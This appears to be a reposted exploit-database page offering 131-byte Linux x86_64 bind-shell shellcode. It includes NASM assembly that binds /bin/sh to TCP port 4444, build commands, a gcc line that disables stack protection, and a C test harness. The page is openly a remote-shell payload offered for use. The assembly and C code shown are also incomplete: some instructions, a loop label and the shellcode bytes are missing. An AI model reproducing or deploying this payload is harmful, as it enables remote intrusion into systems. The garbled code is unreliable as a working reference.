Linux x86_64 TCP4444 Bindshell Shellcode

June 9, 2019   |   by Zeroday
131 bytes small Linux/x86_64 /bin/sh TCP/4444 shellbinding shellcode.
;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  131 bytes
;github =
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 4444"
================== ASSEMBLY ========================================
global _start
section .text
  xor rsi,  rsi  ;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
        ;set rax and rdi to zero
  ;int socket(int domain, int type, int protocol);
  push 41      ;sys_socket
  pop rax
  push 2
  pop rdi
  inc rsi      ;SOCK_STREAM
  xor rdx,  rdx
  ;save the return value for future use
  xchg rdi, rax
  ; sin_zero:        0
  ; sin_addr.s_addr: INADDR_ANY = 0
  ; sin_port:        4444
  ; sin_family:      AF_INET = 2
  xor rax, rax
  push rax      ; sin_zero
  push rax      ; zero out another 8 bytes for remaining members
  mov word [rsp+2], 0x5c11  ; sin_port = 4444
  mov byte [rsp], 0x2    ; sin_family
  ;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
  xor   rdx,  rdx
  push   49
  pop   rax
  push  rsp
  pop   rsi    ;sockaddr stack pointer
  add  rdx,  16  ;sizeof sockaddr
  ;int listen(int sockfd, int backlog);
  xor     rsi,  rsi
  push   50    ;sys_listen
  pop   rax
  inc   rsi    ;backlog = number of clients
  ;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
  push   43     ;sys_accept
  pop   rax
  mov rsi, rsp    ; stack pointer for client sockaddr
  mov byte [rsp-1], 0x10  ; put size of the structure on the stack
  dec rsp      ; adjust stack pointer for previous
  mov rdx, rsp    ; stack pointer for struct size
  ;save client socket
  xchg r10,   rax
  ;int close(int fd);
  push  3    ;sys_close
  pop   rax
  push  rax    ;save 3 on the stack for rsi in dup2
  xchg    rdi,  r10  ;client socket as first parameter for dup2
  pop   rsi
  ;int dup2(int oldfd, int newfd);
  push  33    ;sys_dup2
  pop  rax
  dec   rsi
  loopnz  dup2loop
  ;int execve(const char *filename, char *const argv[], char *const envp[]);
  xor eax,  eax
  add al,    59      ;sys_execve
  xor rdi,  rdi      ;set rdi to zero
  push rdi        ;push null on the stack
  mov rdi,  0x68732F2f6e69622F  ;bin//sh in reverse
  push rdi
  mov rdi,  rsp      ;set stack pointer to rdi
  xor rsi,  rsi      ;rsi and rdx == 0
  xor rdx,  rdx
=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o
ld tcp_bind.o -o tcp_bind
=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind
======================C program=====================================
#include <stdio.h>
#include <string.h>
unsigned char shellcode[]=\
int main(){
        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
        int (*ret)() = (int(*)())shellcode;

Leave Your Comment

eighteen − four =